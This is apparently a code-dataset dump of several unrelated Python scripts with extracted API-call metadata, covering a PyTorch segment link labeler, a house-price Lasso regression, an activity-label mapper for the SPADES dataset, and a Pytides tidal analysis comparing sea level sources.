import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n'), ((2663, 2768), 'lib.camera.camera.CameraInfoPacket', 'CameraInfoPacket', ([], {'P': 'None', 'K': 'K', 'R': 'Rw2c_pitch_augmented', 't': 'Tw2c_pitch_augmented', 'dist_coeff': 'dist_coeff'}), '(P=None, K=K, 
R=Rw2c_pitch_augmented, t=\n Tw2c_pitch_augmented, dist_coeff=dist_coeff)\n', (2679, 2768), False, 'from lib.camera.camera import CameraInfoPacket, catesian2homogenous\n'), ((3837, 3862), 'camera_augmentation.mkdirs', 'mkdirs', (['CAMERA_PARAM_PATH'], {}), '(CAMERA_PARAM_PATH)\n', (3843, 3862), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((3875, 3895), 'camera_augmentation.mkdirs', 'mkdirs', (['POSE_2D_PATH'], {}), '(POSE_2D_PATH)\n', (3881, 3895), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((5865, 5931), 'numpy.savez', 'np.savez', (['POSE2D_FILENAME'], {'metadata': 'METADATA', 'positions_2d': 'pose_2d'}), '(POSE2D_FILENAME, metadata=METADATA, positions_2d=pose_2d)\n', (5873, 5931), True, 'import numpy as np\n'), ((1329, 1372), 'numpy.load', 'np.load', (['FILE_TO_3D_POSE'], {'allow_pickle': '(True)'}), '(FILE_TO_3D_POSE, allow_pickle=True)\n', (1336, 1372), True, 'import numpy as np\n'), ((5264, 5309), 'json.dump', 'json.dump', (['[camera_param]', 'file_obj'], {'indent': '(4)'}), '([camera_param], file_obj, indent=4)\n', (5273, 5309), False, 'import json\n'), ((3164, 3191), 'lib.camera.camera.catesian2homogenous', 'catesian2homogenous', (['kpt_3d'], {}), '(kpt_3d)\n', (3183, 3191), False, 'from lib.camera.camera import CameraInfoPacket, catesian2homogenous\n'), ((3338, 3374), 'camera_augmentation.check_in_frame', 'check_in_frame', (['kpt_2d', 'RES_W', 'RES_H'], {}), '(kpt_2d, RES_W, RES_H)\n', (3352, 3374), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n')]
|
# basics
from typing import List, Tuple, DefaultDict, Dict, Union
from collections import defaultdict
import pandas as pd
import numpy as np
# pytorch
import torch
from torch import Tensor
import torch.nn as nn
import torch.nn.functional as F
#segnlp
from segnlp import utils
class DirLinkLabeler(nn.Module):
"""
    Directional Link Labeler works on the level of all possible pairs. It takes all bi-directional pairs
    between segments and predicts the directional labels, including None for no link and root for a segment
    pointing to itself.
"""
def __init__(self,
input_size:int,
output_size:int,
match_threshold : float = 0.5,
loss_reduction = "mean",
ignore_index = -1,
weight_init : Union[str, dict] = None,
):
super().__init__()
self.loss_reduction = loss_reduction
self.ignore_index = ignore_index
self.match_threshold = match_threshold
        # if we have link labels {root, REL1, REL2} we will predict the following labels
# {None, root, REL1, REL2, REL1-rev, REL2-rev}
# 0 1 2 3 4 5
self.link_labels_wo_root = output_size -1
self.rev_label_treshhold = output_size
output_size = ((output_size -1) * 2 ) + 2
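        # Illustrative check (added comment, not in the original): with 3 incoming link
        # labels {root, REL1, REL2}, link_labels_wo_root = 2, rev_label_treshhold = 3 and
        # output_size = (3 - 1) * 2 + 2 = 6, matching the 6 classes
        # {None, root, REL1, REL2, REL1-rev, REL2-rev} enumerated above.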
self.clf = nn.Linear(input_size, output_size)
utils.init_weights(self, weight_init)
def __get_preds(self,
logits: Tensor,
pair_p1: Tensor,
pair_p2: Tensor,
sample_id: Tensor
):
        # we take the max logit value and its label index for each pair
v, l = torch.max(logits, dim=-1)
pair_p1 = utils.ensure_numpy(pair_p1)
pair_p2 = utils.ensure_numpy(pair_p2)
#then we build a df
df = pd.DataFrame(
{
"value": v.detach().numpy(),
"label": l.detach().numpy(),
"p1": pair_p1,
"p2": pair_p2,
}
)
        # for each pair where the prediction is an X-rev relation we need to swap the order of the
        # members of the pair. I.e. if we have a pair (p1, p2) where the label is X-rev, we swap places
        # of p1 and p2. This makes p1 our column for SOURCE and p2 our column for TARGET,
        # which means that the value of p2 is the index of the segment in the sample that p1 links to.
p1_p2 = df.loc[:, ["p1", "p2"]].to_numpy()
p1_p2_new = np.zeros_like(p1_p2)
rev_preds_filter = (df["label"] > self.rev_label_treshhold).to_numpy()
p1_p2_new[rev_preds_filter, 0] = p1_p2[rev_preds_filter, 1]
p1_p2_new[rev_preds_filter, 1] = p1_p2[rev_preds_filter, 0]
p1_p2_new[~rev_preds_filter, 0] = p1_p2[~rev_preds_filter, 0]
p1_p2_new[~rev_preds_filter, 1] = p1_p2[~rev_preds_filter, 1]
df.loc[:, ["p1", "p2"]] = p1_p2_new
        # after we have set SOURCE and TARGET we normalize the link_labels to non-"-Rev" labels
df.loc[rev_preds_filter, "label"] -= self.link_labels_wo_root
        # We can filter out all pairs where the prediction is 0 (None), which means that the pair
        # is predicted not to link (or, more precisely, "there is no relation between them").
        # However, each segment needs to link to something, and because we can predict 0
        # for all pairs with a certain source, we need to set the label for those pairs to a
        # default value, i.e. themselves. So, for each segment where all predictions are 0, we set the
        # link to be equal to itself.
no_link = df["label"] != 0
self_refs = df["p1"] == df["p2"]
cond = np.logical_or(no_link, self_refs)
df.loc[cond, "label"] = 1 # set the label to root
df = df[cond] # remove all rows where label == 0 except where p1 == p2
        # we also move the labels down by 1 so that they match the original label set, e.g. None is
        # not a valid link_label
df.loc[:, "label"] -= 1
        # Lastly we want to sort all the pairs and then select the first row
        # for each unique p1 (source segment). I.e. we get the highest-scored
        # link and link_label for any unique segment p1
df.sort_values(by=['value'], inplace=True, ascending=False)
seg_df = df.groupby("p1").first()
        # lastly, we need to turn p2 into a link, i.e. p2 refers to a unique segment in the batch
        # but links need to be an index to a segment within a sample.
        # To normalize p2 we subtract the utils.np_cumsum_zero() of all sample segment lengths,
        # i.e. the start of the global segment id for each sample
lengths_segs = pd.DataFrame({"p1": pair_p1, "sample_id":sample_id}).groupby("sample_id", sort = False)["p1"].nunique().to_numpy()
g_seg_starts = utils.np_cumsum_zero(lengths_segs)
seg_df["link"] = seg_df.pop("p2") - np.repeat(g_seg_starts, lengths_segs)
link_label_preds = seg_df["label"].to_numpy()
links = seg_df["link"].to_numpy()
return link_label_preds, links
def forward(self,
input:Tensor,
pair_p1 : Tensor,
pair_p2 : Tensor,
sample_id: Tensor,
):
logits = self.clf(input)
link_labels, links = self.__get_preds(
logits = logits,
pair_p1 = pair_p1,
pair_p2 = pair_p2,
sample_id = sample_id,
)
return logits, link_labels, links
def loss(self,
targets: Tensor,
logits: Tensor,
directions: Tensor,
true_link: Tensor,
p1_match_ratio: Tensor,
p2_match_ratio: Tensor
):
        # creating a mask over all pairs which tells us which pairs include a segment
        # which is not a TRUE segment, i.e. one that does not overlap with a ground truth
        # segment to a certain, configurable extent
cond1 = p1_match_ratio >= self.match_threshold
cond2 = p2_match_ratio >= self.match_threshold
true_segs = torch.logical_and(
cond1,
cond2,
)
# then we combine the true_seg mask with true link mask and negate it so we have a mask
# which is True on each position the pair should be a NEGATIVE SAMPLE
neg_mask = ~torch.logical_and(
true_segs,
true_link
)
        # target labels are not directional so we need to make them so. Targets also lack a
        # label for no link. So, we first add 1 to all labels, moving them up and freeing 0 as the None label for no link.
        # Then for all directions which are 2 (backwards/reversed) we add the number of link_labels (minus root)
targets += 1
targets[directions == 2] += self.link_labels_wo_root
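        # Worked example (added comment, not in the original; assumes the 3-label setup
        # {root: 0, REL1: 1, REL2: 2}): a forward REL1 pair gets target 1 + 1 = 2, while the
        # same relation on a reversed pair (direction == 2) gets 2 + link_labels_wo_root = 4,
        # which matches the REL1-rev logit index.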
        # neg_mask includes all the pairs which should be counted as non-linking pairs, e.g. label None.
        # this mask is usually created from all segs that are not linked or pairs that include segments which
        # are not true segments.
targets[neg_mask] = 0
loss = F.cross_entropy(
logits,
targets,
reduction=self.loss_reduction,
ignore_index=self.ignore_index
)
return loss
|
[
"pandas.DataFrame",
"numpy.zeros_like",
"segnlp.utils.np_cumsum_zero",
"torch.nn.functional.cross_entropy",
"segnlp.utils.ensure_numpy",
"torch.nn.Linear",
"torch.max",
"numpy.logical_or",
"numpy.repeat",
"segnlp.utils.init_weights",
"torch.logical_and"
] |
[((1376, 1410), 'torch.nn.Linear', 'nn.Linear', (['input_size', 'output_size'], {}), '(input_size, output_size)\n', (1385, 1410), True, 'import torch.nn as nn\n'), ((1419, 1456), 'segnlp.utils.init_weights', 'utils.init_weights', (['self', 'weight_init'], {}), '(self, weight_init)\n', (1437, 1456), False, 'from segnlp import utils\n'), ((1746, 1771), 'torch.max', 'torch.max', (['logits'], {'dim': '(-1)'}), '(logits, dim=-1)\n', (1755, 1771), False, 'import torch\n'), ((1790, 1817), 'segnlp.utils.ensure_numpy', 'utils.ensure_numpy', (['pair_p1'], {}), '(pair_p1)\n', (1808, 1817), False, 'from segnlp import utils\n'), ((1836, 1863), 'segnlp.utils.ensure_numpy', 'utils.ensure_numpy', (['pair_p2'], {}), '(pair_p2)\n', (1854, 1863), False, 'from segnlp import utils\n'), ((2700, 2720), 'numpy.zeros_like', 'np.zeros_like', (['p1_p2'], {}), '(p1_p2)\n', (2713, 2720), True, 'import numpy as np\n'), ((3907, 3940), 'numpy.logical_or', 'np.logical_or', (['no_link', 'self_refs'], {}), '(no_link, self_refs)\n', (3920, 3940), True, 'import numpy as np\n'), ((5051, 5085), 'segnlp.utils.np_cumsum_zero', 'utils.np_cumsum_zero', (['lengths_segs'], {}), '(lengths_segs)\n', (5071, 5085), False, 'from segnlp import utils\n'), ((6444, 6475), 'torch.logical_and', 'torch.logical_and', (['cond1', 'cond2'], {}), '(cond1, cond2)\n', (6461, 6475), False, 'import torch\n'), ((7654, 7753), 'torch.nn.functional.cross_entropy', 'F.cross_entropy', (['logits', 'targets'], {'reduction': 'self.loss_reduction', 'ignore_index': 'self.ignore_index'}), '(logits, targets, reduction=self.loss_reduction,\n ignore_index=self.ignore_index)\n', (7669, 7753), True, 'import torch.nn.functional as F\n'), ((5130, 5167), 'numpy.repeat', 'np.repeat', (['g_seg_starts', 'lengths_segs'], {}), '(g_seg_starts, lengths_segs)\n', (5139, 5167), True, 'import numpy as np\n'), ((6784, 6823), 'torch.logical_and', 'torch.logical_and', (['true_segs', 'true_link'], {}), '(true_segs, true_link)\n', (6801, 6823), False, 'import torch\n'), ((4912, 4965), 'pandas.DataFrame', 'pd.DataFrame', (["{'p1': pair_p1, 'sample_id': sample_id}"], {}), "({'p1': pair_p1, 'sample_id': sample_id})\n", (4924, 4965), True, 'import pandas as pd\n')]
|
import logging
import numpy as np
import pandas as pd
from sklearn import linear_model
RESOURCE_DIR = '/home/lucasx/PycharmProjects/DataHouse/DataSet/'
logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s \t', level=logging.INFO, filemode='a',
filename='loginfo.log')
def train_and_predict(filepath):
df = pd.read_excel(filepath, 'HouseInfo')
def _preprocessing(dataframe):
dataframe['buildYear'] = dataframe['buildYear'].fillna(np.median(dataframe['buildYear'].dropna()))
label_and_value = {
"武昌": 1,
"江岸": 2,
"江汉": 3,
"硚口": 4,
"洪山": 5,
"青山": 6,
"汉阳": 7,
"东西湖": 8,
"沌口开发区": 9,
"江夏": 10,
"黄陂": 11,
"其他": 12,
"蔡甸": 13,
"汉南": 14,
"新洲": 15
}
dataframe['areaCode'] = [label_and_value[i] for i in dataframe['area']]
return dataframe
df = _preprocessing(dataframe=df).loc[:, ['areaCode', 'buildYear', 'saleNum', 'midPrice']]
df.to_excel(RESOURCE_DIR + 'data.xlsx', sheet_name='Sheet1')
X_digits = df.loc[:, ['areaCode', 'buildYear', 'saleNum']]
y_digits = df.loc[:, ['midPrice']]
regression = linear_model.Lasso(alpha=0.1)
# do cross-validation
X_folds = np.array_split(X_digits, 10)
y_folds = np.array_split(y_digits, 10)
scores = list()
for k in range(10):
X_train = list(X_folds)
X_test = X_train.pop(k)
X_train = np.concatenate(X_train)
y_train = list(y_folds)
y_test = y_train.pop(k)
y_train = np.concatenate(y_train)
scores.append(regression.fit(X_train, y_train).score(X_test, y_test))
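    # Roughly equivalent sketch (added comment, not part of the original) using
    # scikit-learn's helper instead of the manual 10-fold loop above; it only returns
    # the scores and does not leave a fitted model behind:
    # from sklearn.model_selection import cross_val_score
    # scores = cross_val_score(linear_model.Lasso(alpha=0.1),
    #                          X_digits, y_digits.values.ravel(), cv=10)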
logging.info(scores)
from sklearn.externals import joblib
joblib.dump(regression, RESOURCE_DIR + 'reg_model.pkl')
print(
'The max inference accuracy is {:%}'.format(np.array(scores).max()))
def inference(areaCode, buildYear, saleNum):
from sklearn.externals import joblib
regression = joblib.load(RESOURCE_DIR + 'reg_model.pkl')
predict_price = regression.predict(np.array([areaCode, buildYear, saleNum]).reshape(1, 3))
return predict_price
if __name__ == '__main__':
# train_and_predict(RESOURCE_DIR + 'anjuke.xlsx')
price = inference(1, 2015, 1611)
print('Your house worths %d RMB.' % price)
|
[
"sklearn.externals.joblib.dump",
"numpy.concatenate",
"logging.basicConfig",
"pandas.read_excel",
"logging.info",
"numpy.array",
"sklearn.externals.joblib.load",
"numpy.array_split",
"sklearn.linear_model.Lasso"
] |
[((154, 286), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(levelname)s:%(asctime)s:%(message)s \t"""', 'level': 'logging.INFO', 'filemode': '"""a"""', 'filename': '"""loginfo.log"""'}), "(format='%(levelname)s:%(asctime)s:%(message)s \\t',\n level=logging.INFO, filemode='a', filename='loginfo.log')\n", (173, 286), False, 'import logging\n'), ((347, 383), 'pandas.read_excel', 'pd.read_excel', (['filepath', '"""HouseInfo"""'], {}), "(filepath, 'HouseInfo')\n", (360, 383), True, 'import pandas as pd\n'), ((1276, 1305), 'sklearn.linear_model.Lasso', 'linear_model.Lasso', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (1294, 1305), False, 'from sklearn import linear_model\n'), ((1347, 1375), 'numpy.array_split', 'np.array_split', (['X_digits', '(10)'], {}), '(X_digits, 10)\n', (1361, 1375), True, 'import numpy as np\n'), ((1390, 1418), 'numpy.array_split', 'np.array_split', (['y_digits', '(10)'], {}), '(y_digits, 10)\n', (1404, 1418), True, 'import numpy as np\n'), ((1757, 1777), 'logging.info', 'logging.info', (['scores'], {}), '(scores)\n', (1769, 1777), False, 'import logging\n'), ((1824, 1879), 'sklearn.externals.joblib.dump', 'joblib.dump', (['regression', "(RESOURCE_DIR + 'reg_model.pkl')"], {}), "(regression, RESOURCE_DIR + 'reg_model.pkl')\n", (1835, 1879), False, 'from sklearn.externals import joblib\n'), ((2074, 2117), 'sklearn.externals.joblib.load', 'joblib.load', (["(RESOURCE_DIR + 'reg_model.pkl')"], {}), "(RESOURCE_DIR + 'reg_model.pkl')\n", (2085, 2117), False, 'from sklearn.externals import joblib\n'), ((1545, 1568), 'numpy.concatenate', 'np.concatenate', (['X_train'], {}), '(X_train)\n', (1559, 1568), True, 'import numpy as np\n'), ((1651, 1674), 'numpy.concatenate', 'np.concatenate', (['y_train'], {}), '(y_train)\n', (1665, 1674), True, 'import numpy as np\n'), ((2157, 2197), 'numpy.array', 'np.array', (['[areaCode, buildYear, saleNum]'], {}), '([areaCode, buildYear, saleNum])\n', (2165, 2197), True, 'import numpy as np\n'), ((1944, 1960), 'numpy.array', 'np.array', (['scores'], {}), '(scores)\n', (1952, 1960), True, 'import numpy as np\n')]
|
from .. import moment
from .. import mhealth_format as mh
import numpy as np
import pkg_resources
import pandas as pd
from loguru import logger
def _get_annotation_durations(annot_df):
durations = annot_df.groupby(annot_df.columns[3]).apply(
lambda rows: np.sum(rows.iloc[:, 2] - rows.iloc[:, 1]))
return durations
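# Note (added comment): the durations above are per-label totals of (stop_time - start_time)
# and therefore timedelta values, which is why the caller compares them against
# np.timedelta64(interval, 'ms') before deciding whether an activity covers the window.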
def _annot_to_activity(annot_df, pid, start_time, stop_time):
if annot_df is None:
return "Unknown"
if annot_df.shape[0] == 0:
return "Unknown"
label_list = annot_df[mh.ANNOTATION_LABEL_COL].str.lower()
annot_df[mh.ANNOTATION_LABEL_COL] = label_list
annot_df = annot_df.loc[(label_list != 'wear on')
& (label_list != 'wearon'), :]
if annot_df.shape[0] == 0:
return "Unknown"
labels = annot_df.iloc[:, 3].unique()
labels.sort()
label = ' '.join(labels).lower().strip()
# filter if it does not cover the entire 12.8s
durations = _get_annotation_durations(annot_df)
interval = int(moment.Moment.get_duration(
start_time, stop_time, unit='ms'))
if not np.all(durations.values >= np.timedelta64(interval, 'ms')):
return "Transition"
# special cases
if pid == 'SPADES_26':
if 'biking' in label and start_time.hour == 11 and stop_time.minute > 26:
return "Stationary cycle ergometry"
elif pid == 'SPADES_19':
if '3 mph' in label and 'arms on desk' in label and 'treadmill' in label:
return "Level treadmill walking at 3 mph with arms on desk"
if 'stairs' in label and 'up' in label:
return 'Walking upstairs'
elif 'stairs' in label and 'down' in label:
return 'Walking downstairs'
if 'mbta' in label or 'city' in label or 'outdoor' in label:
return 'Unknown'
if "sitting" in label and 'writing' in label:
return 'Sitting and writing'
elif 'stand' in label and 'writ' in label:
return 'Standing and writing at a table'
elif 'sit' in label and ('web' in label or 'typ' in label):
return 'Sitting and typing on a keyboard'
elif 'reclin' in label and ('text' in label or 'web' in label):
return 'Reclining and using phone'
elif 'sit' in label and 'story' in label and ('city' not in label and 'outdoor' not in label):
return "Sitting and talking"
elif "reclin" in label and 'story' in label:
return 'Reclining and talking'
elif "stand" in label and ('web' in label or 'typ' in label):
return "Standing and typing on a keyboard"
elif 'bik' in label and ('stationary' in label or '300' in label):
return "Stationary cycle ergometry"
elif ('treadmill' in label or 'walk' in label) and '1' in label:
return "Level treadmill walking at 1 mph with arms on desk"
elif ('treadmill' in label or 'walk' in label) and '2' in label:
return "Level treadmill walking at 2 mph with arms on desk"
elif 'treadmill' in label and 'phone' in label:
return "Level treadmill walking at 3-3.5 mph while holding a phone to the ear and talking"
elif 'treadmill' in label and 'bag' in label:
return "Level treadmill walking at 3-3.5 mph and carrying a bag"
elif 'treadmill' in label and 'story' in label:
return "Level treadmill walking at 3-3.5 mph while talking"
elif ('treadmill' in label or 'walk' in label) and 'drink' in label:
return 'Level treadmill walking at 3-3.5 mph and carrying a drink'
elif ('treadmill' in label or 'walk' in label) and ('3.5' in label or '3' in label):
return 'Level treadmill walking at 3-3.5 mph'
elif '5.5' in label or 'jog' in label or 'run' in label:
return 'Treadmill running at 5.5 mph & 5% grade'
elif 'laundry' in label:
return 'Standing and folding towels'
elif 'sweep' in label:
return 'Standing and sweeping'
elif 'shelf' in label and 'load' in label:
return 'Standing loading/unloading shelf'
elif 'lying' in label:
return "Lying on the back"
elif label == 'sitting' or ('sit' in label and 'still' in label):
return "Sitting still"
elif label == "still" or 'standing' == label or label == 'standing still':
return "Self-selected free standing"
else:
return 'Unknown'
def _load_task_class_map():
map_filepath = pkg_resources.resource_filename(
'arus', 'spades_lab/task_class_map.csv')
return pd.read_csv(map_filepath)
def class_set(*annot_dfs, task_names=None, st=None, et=None, pid=None, **kwargs):
class_labels = {mh.TIMESTAMP_COL: [st],
mh.START_TIME_COL: [st],
mh.STOP_TIME_COL: [et]}
task_class_map = _load_task_class_map()
annot_df = annot_dfs[0]
activity = _annot_to_activity(annot_df, pid, st, et)
for task_name in task_names:
if task_name not in task_class_map.columns:
logger.warning(
f"{task_name} is not a valid task name for the current dataset")
else:
class_label = task_class_map.loc[task_class_map.ACTIVITY ==
activity, task_name]
class_labels[task_name] = class_label.values.tolist()
class_vector = pd.DataFrame.from_dict(class_labels)
return class_vector
|
[
"numpy.sum",
"pandas.DataFrame.from_dict",
"pandas.read_csv",
"loguru.logger.warning",
"pkg_resources.resource_filename",
"numpy.timedelta64"
] |
[((4347, 4419), 'pkg_resources.resource_filename', 'pkg_resources.resource_filename', (['"""arus"""', '"""spades_lab/task_class_map.csv"""'], {}), "('arus', 'spades_lab/task_class_map.csv')\n", (4378, 4419), False, 'import pkg_resources\n'), ((4440, 4465), 'pandas.read_csv', 'pd.read_csv', (['map_filepath'], {}), '(map_filepath)\n', (4451, 4465), True, 'import pandas as pd\n'), ((5245, 5281), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['class_labels'], {}), '(class_labels)\n', (5267, 5281), True, 'import pandas as pd\n'), ((269, 310), 'numpy.sum', 'np.sum', (['(rows.iloc[:, 2] - rows.iloc[:, 1])'], {}), '(rows.iloc[:, 2] - rows.iloc[:, 1])\n', (275, 310), True, 'import numpy as np\n'), ((4911, 4990), 'loguru.logger.warning', 'logger.warning', (['f"""{task_name} is not a valid task name for the current dataset"""'], {}), "(f'{task_name} is not a valid task name for the current dataset')\n", (4925, 4990), False, 'from loguru import logger\n'), ((1124, 1154), 'numpy.timedelta64', 'np.timedelta64', (['interval', '"""ms"""'], {}), "(interval, 'ms')\n", (1138, 1154), True, 'import numpy as np\n')]
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 24 13:31:37 2019
@author: gsolana
Based on:
https://github.com/sam-cox/pytides/wiki/How-to-make-your-own-Tide-Table-using-Python-and-Pytides
https://ocefpaf.github.io/python4oceanographers/blog/2014/07/07/pytides/
"""
import csv
import numpy as np
import pandas as pd
from pandas import read_csv, DataFrame
from datetime import datetime, timedelta
import matplotlib.pyplot as plt
from pytides import tide
from pytides import constituent
##Import our tidal data
filepath='../data/sealevel/'
def ibane_deck2017():
"""
    Read and decompose the Inhambane deck tidal gauge sea level series
"""
t = []
heights = []
filename='Datos_mareografo_c.csv'
csv_file = open(filepath+filename, 'r')
reader = csv.reader(csv_file)
next(reader)
next(reader)
for row in reader:
#print(" ".join(row[:6]))
a=row[0]+" "+row[1]
t.append(datetime.strptime(a, "%y/%m/%d %H:%M:%S"))
heights.append(float((row[3])))
csv_file.close()
##Fit the tidal data to the harmonic model using Pytides
ibaneconst= [ constituent._M2,
constituent._S2,
constituent._N2,
constituent._K2,
constituent._K1,
constituent._O1]
my_tide = tide.Tide.decompose(np.array(heights[::1]), np.array(t[::1]), constituents=ibaneconst)
return t, heights, my_tide
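# Illustrative sketch (assuming the standard Pytides API, as used in main() below):
# once tide.Tide.decompose() has fitted the constituents, the returned model can
# predict heights at arbitrary datetimes with .at().
#
#   t, heights, my_tide = ibane_deck2017()
#   predicted = my_tide.at(t)                 # modelled heights at the observed times
#   residuals = np.array(heights) - predicted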
def readUHSML():
    '''Read the UHSLC 2011 sea level dataset
'''
t = []
heights = []
filename2011='Inhambane_2011-07-02_2011-09-27_h900a.csv'
csv_file2011 = open(filepath+filename2011, 'r')
reader = csv.reader(csv_file2011, delimiter=',')
for row in reader:
tmp = float(row[4])
if (tmp <= -30000) :
next(reader)
else:
#print(" ".join(row[:6]))
a=row[0]+"/"+row[1]+"/"+row[2]+" "+row[3]
t.append(datetime.strptime(a, "%Y/%m/%d %H") - 0*timedelta(hours=1.15))
heights.append(float((row[4]))/1000)
csv_file2011.close()
##UHSLC Fit the tidal data to the harmonic model using Pytides
my_tide2011 = tide.Tide.decompose(np.array(heights[::]), np.array(t[::]))
return t, heights, my_tide2011
def read_otpx():
"""
"""
otpx_prediction='/home/gsolana/Work/UP_Unisaf/00 PesquisaEXtensao/2017 Modelicacao Baia/00_Work/00_Python/Datos/tpxo/ibane_predict_OTPX_9v1.out'
otpx_prediction='ibane_predict_OTPX_9v1.out'
#Read TPXO Atlas data prediction
otpx_pred=read_csv(
filepath+otpx_prediction,
sep=r'\s+',
header=3,
skiprows=6,
names=['Lat', 'Lon', 'Date', 'Time', 'Z', 'Depth'],
parse_dates = {'date_col' : ["Date", "Time"]}
)
    #Convert date_col from string to datetime format
otpx_pred['date_col'] = pd.to_datetime(otpx_pred['date_col'])
##Fit the tidal data to the harmonic model using Pytides
OTPX_tide = tide.Tide.decompose(otpx_pred.Z, otpx_pred.date_col)
return otpx_pred.date_col, otpx_pred.Z, OTPX_tide
def saveFig(file=""):
""" Save the figure
INPUT:
filename : the complete filename (path + filename + extension)
"""
if file != "":
plt.savefig('../sample/'+file+'.png', format='png', dpi=300)
plt.savefig('../sample/'+file+'.pdf', format='pdf', dpi=300, transparent=True)
def main():
"""
"""
# Ibane tidal gauge
ibane_t, ibane_heights, ibane_tide = ibane_deck2017()
constituent = [c.name for c in ibane_tide.model['constituent']]
df_ibane = DataFrame(ibane_tide.model, index=constituent).drop('constituent', axis=1)
##############################################################################
##UHSLC Fit the tidal data to the harmonic model using Pytides
t, heights, UHSLM_tide2011 = readUHSML()
##UHSLC Fit the tidal data to the harmonic model using Pytides
#UHSLM_tide2011 = tide.Tide.decompose(np.array(heights[::]), np.array(t[::]))
#constituent = [c.name for c in tide.model['constituent']]
UHSLM_constituent = [c.name for c in UHSLM_tide2011.model['constituent']]
UHSLM_df2011 = DataFrame(UHSLM_tide2011.model, index=UHSLM_constituent).drop('constituent', axis=1)
UHSLM_prediction201707 = UHSLM_tide2011.at(ibane_t)
##############################################################################
otpx_t, otpx_z, OTPX_tide=read_otpx()
OTPX_constituent = [c.name for c in OTPX_tide.model['constituent']]
OTPX_df = DataFrame(OTPX_tide.model, index=OTPX_constituent).drop('constituent', axis=1)
OTPX_prediction201707=OTPX_tide.at(ibane_t)
#################################################################################
fig = plt.figure(figsize=(6,4))
fig.suptitle('Tidal level',fontsize=9)
ax2 = plt.subplot()
ax2.grid(b=True, linestyle='-')
ax2.plot(ibane_t,
ibane_heights-df_ibane.amplitude['Z0'],
"-",
c="red",
label="2017 Observed Ibane deck")
ax2.plot(ibane_t,
UHSLM_prediction201707-UHSLM_df2011.amplitude['Z0'],
"-",
c="blue",
label="UHSLC 2017 Modeled")
ax2.plot(ibane_t,
OTPX_prediction201707-OTPX_df.amplitude['Z0'],
"-",
c="green",
label="TPXO Atlas Modeled")
ax2.set_xticklabels(ax2.get_xticklabels(),rotation=-45,horizontalalignment='center')
#ax2.set_xlabel('Date')
yrange = (-1.50, 1.5)
ax2.set_ylim(yrange)
ax2.set_ylabel('Sea level (m)')
ax2.legend(loc ='lower center',fontsize=8)
#plt.tight_layout()
fig.show()
saveFig(file='tidalcomparation')
if __name__ == "__main__":
main()
|
[
"pandas.DataFrame",
"matplotlib.pyplot.subplot",
"pytides.tide.Tide.decompose",
"csv.reader",
"pandas.read_csv",
"matplotlib.pyplot.figure",
"datetime.datetime.strptime",
"pandas.to_datetime",
"numpy.array",
"datetime.timedelta",
"matplotlib.pyplot.savefig"
] |
[((828, 848), 'csv.reader', 'csv.reader', (['csv_file'], {}), '(csv_file)\n', (838, 848), False, 'import csv\n'), ((1731, 1770), 'csv.reader', 'csv.reader', (['csv_file2011'], {'delimiter': '""","""'}), "(csv_file2011, delimiter=',')\n", (1741, 1770), False, 'import csv\n'), ((2620, 2795), 'pandas.read_csv', 'read_csv', (['(filepath + otpx_prediction)'], {'sep': '"""\\\\s+"""', 'header': '(3)', 'skiprows': '(6)', 'names': "['Lat', 'Lon', 'Date', 'Time', 'Z', 'Depth']", 'parse_dates': "{'date_col': ['Date', 'Time']}"}), "(filepath + otpx_prediction, sep='\\\\s+', header=3, skiprows=6,\n names=['Lat', 'Lon', 'Date', 'Time', 'Z', 'Depth'], parse_dates={\n 'date_col': ['Date', 'Time']})\n", (2628, 2795), False, 'from pandas import read_csv, DataFrame\n'), ((2953, 2990), 'pandas.to_datetime', 'pd.to_datetime', (["otpx_pred['date_col']"], {}), "(otpx_pred['date_col'])\n", (2967, 2990), True, 'import pandas as pd\n'), ((3073, 3125), 'pytides.tide.Tide.decompose', 'tide.Tide.decompose', (['otpx_pred.Z', 'otpx_pred.date_col'], {}), '(otpx_pred.Z, otpx_pred.date_col)\n', (3092, 3125), False, 'from pytides import tide\n'), ((4918, 4944), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(6, 4)'}), '(figsize=(6, 4))\n', (4928, 4944), True, 'import matplotlib.pyplot as plt\n'), ((5003, 5016), 'matplotlib.pyplot.subplot', 'plt.subplot', ([], {}), '()\n', (5014, 5016), True, 'import matplotlib.pyplot as plt\n'), ((1412, 1434), 'numpy.array', 'np.array', (['heights[::1]'], {}), '(heights[::1])\n', (1420, 1434), True, 'import numpy as np\n'), ((1436, 1452), 'numpy.array', 'np.array', (['t[::1]'], {}), '(t[::1])\n', (1444, 1452), True, 'import numpy as np\n'), ((2248, 2268), 'numpy.array', 'np.array', (['heights[:]'], {}), '(heights[:])\n', (2256, 2268), True, 'import numpy as np\n'), ((2271, 2285), 'numpy.array', 'np.array', (['t[:]'], {}), '(t[:])\n', (2279, 2285), True, 'import numpy as np\n'), ((3362, 3426), 'matplotlib.pyplot.savefig', 'plt.savefig', (["('../sample/' + file + '.png')"], {'format': '"""png"""', 'dpi': '(300)'}), "('../sample/' + file + '.png', format='png', dpi=300)\n", (3373, 3426), True, 'import matplotlib.pyplot as plt\n'), ((3431, 3517), 'matplotlib.pyplot.savefig', 'plt.savefig', (["('../sample/' + file + '.pdf')"], {'format': '"""pdf"""', 'dpi': '(300)', 'transparent': '(True)'}), "('../sample/' + file + '.pdf', format='pdf', dpi=300,\n transparent=True)\n", (3442, 3517), True, 'import matplotlib.pyplot as plt\n'), ((987, 1028), 'datetime.datetime.strptime', 'datetime.strptime', (['a', '"""%y/%m/%d %H:%M:%S"""'], {}), "(a, '%y/%m/%d %H:%M:%S')\n", (1004, 1028), False, 'from datetime import datetime, timedelta\n'), ((3737, 3783), 'pandas.DataFrame', 'DataFrame', (['ibane_tide.model'], {'index': 'constituent'}), '(ibane_tide.model, index=constituent)\n', (3746, 3783), False, 'from pandas import read_csv, DataFrame\n'), ((4321, 4377), 'pandas.DataFrame', 'DataFrame', (['UHSLM_tide2011.model'], {'index': 'UHSLM_constituent'}), '(UHSLM_tide2011.model, 